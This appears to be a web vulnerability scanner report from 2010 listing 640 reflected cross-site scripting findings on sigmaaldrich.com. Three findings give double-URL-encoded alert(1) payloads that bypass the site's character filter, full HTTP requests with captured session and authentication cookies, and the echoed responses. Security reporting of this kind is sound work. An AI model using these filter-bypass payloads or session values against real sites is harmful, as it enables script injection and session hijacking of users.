1.486. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 4]

1.487. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 5]

1.488. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 1]

1.489. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 2]

1.490. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 3]

1.491. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 4]

1.492. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 5]

1.493. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 1]

1.494. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 2]

1.495. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 3]

1.496. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 4]

1.497. http://www.sigmaaldrich.com/foresee/foresee-trigger.js [REST URL parameter 1]

1.498. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 1]

1.499. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 2]

1.500. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 1]

1.501. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 2]

1.502. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 1]

1.503. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 2]

1.504. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 1]

1.505. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 2]

1.506. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 1]

1.507. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 2]

1.508. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 3]

1.509. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 1]

1.510. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 2]

1.511. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 3]

1.512. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 1]

1.513. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 2]

1.514. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 3]

1.515. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 1]

1.516. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 2]

1.517. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 1]

1.518. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 2]

1.519. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 1]

1.520. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 2]

1.521. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 1]

1.522. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 2]

1.523. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 1]

1.524. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 2]

1.525. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 1]

1.526. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 2]

1.527. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 1]

1.528. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 2]

1.529. http://www.sigmaaldrich.com/life-science.html [REST URL parameter 1]

1.530. http://www.sigmaaldrich.com/life-science/ [REST URL parameter 1]

1.531. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 1]

1.532. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 2]

1.533. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 1]

1.534. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 2]

1.535. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 1]

1.536. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 2]

1.537. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 1]

1.538. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 2]

1.539. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 1]

1.540. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 2]

1.541. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 1]

1.542. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 2]

1.543. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 1]

1.544. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 2]

1.545. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 3]

1.546. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 1]

1.547. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 2]

1.548. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 3]

1.549. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 4]

1.550. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/mission-custom-request.html [REST URL parameter 1]

1.551. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 1]

1.552. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 2]

1.553. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 1]

1.554. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 2]

1.555. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 1]

1.556. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 2]

1.557. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 1]

1.558. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 2]

1.559. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 1]

1.560. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 2]

1.561. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 3]

1.562. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 1]

1.563. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 2]

1.564. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 3]

1.565. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 1]

1.566. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 2]

1.567. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 1]

1.568. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 2]

1.569. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 1]

1.570. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 2]

1.571. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 1]

1.572. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 2]

1.573. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 1]

1.574. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 2]

1.575. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 1]

1.576. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 2]

1.577. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 1]

1.578. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 2]

1.579. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 1]

1.580. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 2]

1.581. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 3]

1.582. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 1]

1.583. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 2]

1.584. http://www.sigmaaldrich.com/materials-science.html [REST URL parameter 1]

1.585. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 1]

1.586. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 2]

1.587. http://www.sigmaaldrich.com/materials-science/learning-center.html [REST URL parameter 1]

1.588. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 1]

1.589. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 2]

1.590. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 1]

1.591. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 2]

1.592. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 1]

1.593. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 2]

1.594. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 1]

1.595. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 2]

1.596. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 1]

1.597. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 2]

1.598. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 1]

1.599. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 2]

1.600. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 1]

1.601. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 2]

1.602. http://www.sigmaaldrich.com/materials-science/renewable-alternative-energy.html [REST URL parameter 1]

1.603. http://www.sigmaaldrich.com/safc-global/en-us/home.html [REST URL parameter 1]

1.604. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 1]

1.605. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 2]

1.606. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 3]

1.607. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 4]

1.608. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 5]

1.609. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 1]

1.610. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 2]

1.611. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 3]

1.612. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 4]

1.613. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 5]

1.614. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 1]

1.615. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 2]

1.616. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 1]

1.617. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 2]

1.618. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 1]

1.619. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 2]

1.620. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 3]

1.621. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 1]

1.622. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 2]

1.623. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 1]

1.624. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 2]

1.625. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 1]

1.626. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 2]

1.627. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 3]

1.628. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 1]

1.629. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 2]

1.630. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 3]

1.631. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 1]

1.632. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 2]

1.633. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 3]

1.634. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 1]

1.635. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 2]

1.636. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 1]

1.637. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 2]

1.638. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 1]

1.639. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 2]

1.640. http://www.sigmaaldrich.com/united-states.html [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 640 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.sigmaaldrich.com/analytical-chromatography.html [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86200%2522%253balert%25281%2529%252f%252fd55c80e042a was submitted in the REST URL parameter 1. This input was echoed as 86200";alert(1)//d55c80e042a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /86200%2522%253balert%25281%2529%252f%252fd55c80e042a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/86200";alert(1)//d55c80e042a","E404") ;
   </script>
...[SNIP]...

1.2. http://www.sigmaaldrich.com/analytical-chromatography/air-monitoring.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/air-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60fed%2522%253balert%25281%2529%252f%252f46bc722615b was submitted in the REST URL parameter 1. This input was echoed as 60fed";alert(1)//46bc722615b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography60fed%2522%253balert%25281%2529%252f%252f46bc722615b/air-monitoring.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography60fed";alert(1)//46bc722615b/air-monitoring.html","E404") ;
   </script>
...[SNIP]...

1.3. http://www.sigmaaldrich.com/analytical-chromatography/air-monitoring.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/air-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5adfd%2522%253balert%25281%2529%252f%252f6b84be9a72b was submitted in the REST URL parameter 2. This input was echoed as 5adfd";alert(1)//6b84be9a72b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/5adfd%2522%253balert%25281%2529%252f%252f6b84be9a72b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
